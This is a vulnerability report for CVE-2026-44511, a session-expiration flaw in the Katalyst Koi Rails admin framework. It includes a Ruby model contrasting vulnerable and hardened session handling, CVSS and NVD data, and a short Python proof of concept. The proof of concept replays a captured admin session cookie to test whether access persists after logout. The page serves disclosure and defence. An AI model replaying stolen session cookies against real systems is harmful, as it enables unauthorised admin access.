Security Vulnerability Report
CVE-2026-44511 (CVSS 7.4 HIGH)

Published: 2026-05-14 17:16:23
Last Modified: 2026-05-14 18:19:25

Description

Katalyst Koi is a framework for building Rails admin functionality. Prior to 4.20.0 and 5.6.0, admin session cookies were not invalidated when an admin user logged out. An attacker with access to a valid admin session cookie could continue to access admin functionality after logout, until the cookie expired or session secrets were rotated. This vulnerability is fixed in 4.20.0 and 5.6.0.
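The failure the description names is CWE-613 (insufficient session expiration): a signed session cookie proves integrity but, with no server-side record of issued sessions, logout can only ask the browser to drop the cookie, and any copy stays valid until it expires or the signing secret is rotated. The Ruby model below is an added example and is not Koi's or Rails' code; the class names `SignedCookieSession`, `StatelessSessions`, `TrackedSessions` and the check `cookie_survives_logout?` are hypothetical. It contrasts the stateless pattern with one that tracks session ids and revokes them at logout, and shows why rotating the secret also invalidates old cookies.

```ruby
require "openssl"
require "securerandom"
require "json"
require "base64"

# Constructed model of a signed, stateless session cookie (illustration only).
# The HMAC proves integrity; the server keeps no record of issued sessions.
class SignedCookieSession
  def initialize(secret, ttl: 3600)
    @secret = secret
    @ttl = ttl
  end

  # Issue a cookie carrying a user id, a random session id and an expiry.
  def issue(user_id, now: Time.now.to_i)
    payload = { "uid" => user_id, "sid" => SecureRandom.hex(16), "exp" => now + @ttl }
    data = Base64.strict_encode64(payload.to_json)
    "#{data}--#{sign(data)}"
  end

  # Return the payload when signature and expiry check out, otherwise nil.
  # A cookie signed under a rotated (different) secret fails here.
  def verify(cookie, now: Time.now.to_i)
    data, sig = cookie.to_s.split("--", 2)
    return nil unless data && sig && constant_time_equal?(sign(data), sig)
    payload = JSON.parse(Base64.strict_decode64(data))
    payload["exp"] > now ? payload : nil
  rescue ArgumentError, JSON::ParserError
    nil
  end

  private

  def sign(data)
    OpenSSL::HMAC.hexdigest("SHA256", @secret, data)
  end

  def constant_time_equal?(a, b)
    return false unless a.bytesize == b.bytesize
    a.bytes.zip(b.bytes).reduce(0) { |acc, (x, y)| acc | (x ^ y) }.zero?
  end
end

# Vulnerable pattern (the behaviour the advisory describes): logout only asks
# the browser to discard the cookie; the server has nothing to revoke.
class StatelessSessions
  def initialize(cookies)
    @cookies = cookies
  end

  def login(user_id)
    @cookies.issue(user_id)
  end

  def logout(_cookie)
    # No server-side state: a copied cookie stays valid until "exp".
  end

  def authorized?(cookie)
    !@cookies.verify(cookie).nil?
  end
end

# Hardened pattern: record each issued session id and delete it at logout, so a
# cookie whose sid is no longer on file is rejected even with a good signature.
class TrackedSessions
  def initialize(cookies)
    @cookies = cookies
    @active = {} # sid => user_id
  end

  def login(user_id)
    cookie = @cookies.issue(user_id)
    @active[@cookies.verify(cookie)["sid"]] = user_id
    cookie
  end

  def logout(cookie)
    payload = @cookies.verify(cookie)
    @active.delete(payload["sid"]) if payload
  end

  def authorized?(cookie)
    payload = @cookies.verify(cookie)
    !payload.nil? && @active.key?(payload["sid"])
  end
end

# Regression check for CWE-613: does a copy of the cookie still authorize
# after the legitimate user has logged out?
def cookie_survives_logout?(sessions)
  cookie = sessions.login("admin")
  copy = cookie.dup
  sessions.logout(cookie)
  sessions.authorized?(copy)
end

if __FILE__ == $PROGRAM_NAME
  secret = "constructed-demo-secret"
  puts "stateless: cookie survives logout = #{cookie_survives_logout?(StatelessSessions.new(SignedCookieSession.new(secret)))}"
  puts "tracked:   cookie survives logout = #{cookie_survives_logout?(TrackedSessions.new(SignedCookieSession.new(secret)))}"
end
```

The `cookie_survives_logout?` check is the kind of test a defender can keep in a suite: it should return false after the fix. In a real deployment the `@active` map would live in a shared store (database or cache) keyed by session id, and the same store lets an operator revoke every session for a user when a cookie is suspected of having leaked, without waiting for expiry or a secret rotation.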

CVSS Details

CVSS Score
7.4
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

No configuration data available.

Katalyst Koi < 4.20.0
Katalyst Koi < 5.6.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# Proof of Concept: Session Cookie Reuse after Logout
import requests


def check_session_reuse(target_url, stolen_cookie):
    """
    Attempts to access the admin panel using a stolen cookie after the
    legitimate user has logged out.
    """
    headers = {
        "User-Agent": "CVE-2026-44511-PoC/1.0",
        "Cookie": stolen_cookie
    }
    try:
        response = requests.get(target_url, headers=headers, timeout=10)
        # Check if response indicates successful admin access
        if response.status_code == 200 and (
            "admin" in response.text.lower() or "dashboard" in response.text.lower()
        ):
            return "[+] Vulnerability Confirmed: Admin session is still active after logout."
        else:
            return "[-] Session invalid or access denied."
    except Exception as e:
        return f"[!] Error occurred: {str(e)}"


if __name__ == "__main__":
    # Replace with actual target and captured cookie
    target = "http://localhost:3000/admin"
    cookie = "_katalyst_koi_session=eyJfY3NyZiI6..."
    print(check_session_reuse(target, cookie))
```

References

GHSA-4cx3-3c38-j9vv (GitHub Security Advisory): https://github.com/katalyst/koi/security/advisories/GHSA-4cx3-3c38-j9vv
Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-44511",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-14T17:16:22.760",
    "lastModified": "2026-05-14T18:19:25.260",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Katalyst Koi is a framework for building Rails admin functionality. Prior to 4.20.0 and 5.6.0, admin session cookies were not invalidated when an admin user logged out. An attacker with access to a valid admin session cookie could continue to access admin functionality after logout, until the cookie expired or session secrets were rotated. This vulnerability is fixed in 4.20.0 and 5.6.0."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
            "baseScore": 7.4,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "HIGH",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.2,
          "impactScore": 5.2
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          { "lang": "en", "value": "CWE-613" }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/katalyst/koi/security/advisories/GHSA-4cx3-3c38-j9vv",
        "source": "[email protected]"
      }
    ]
  }
}
```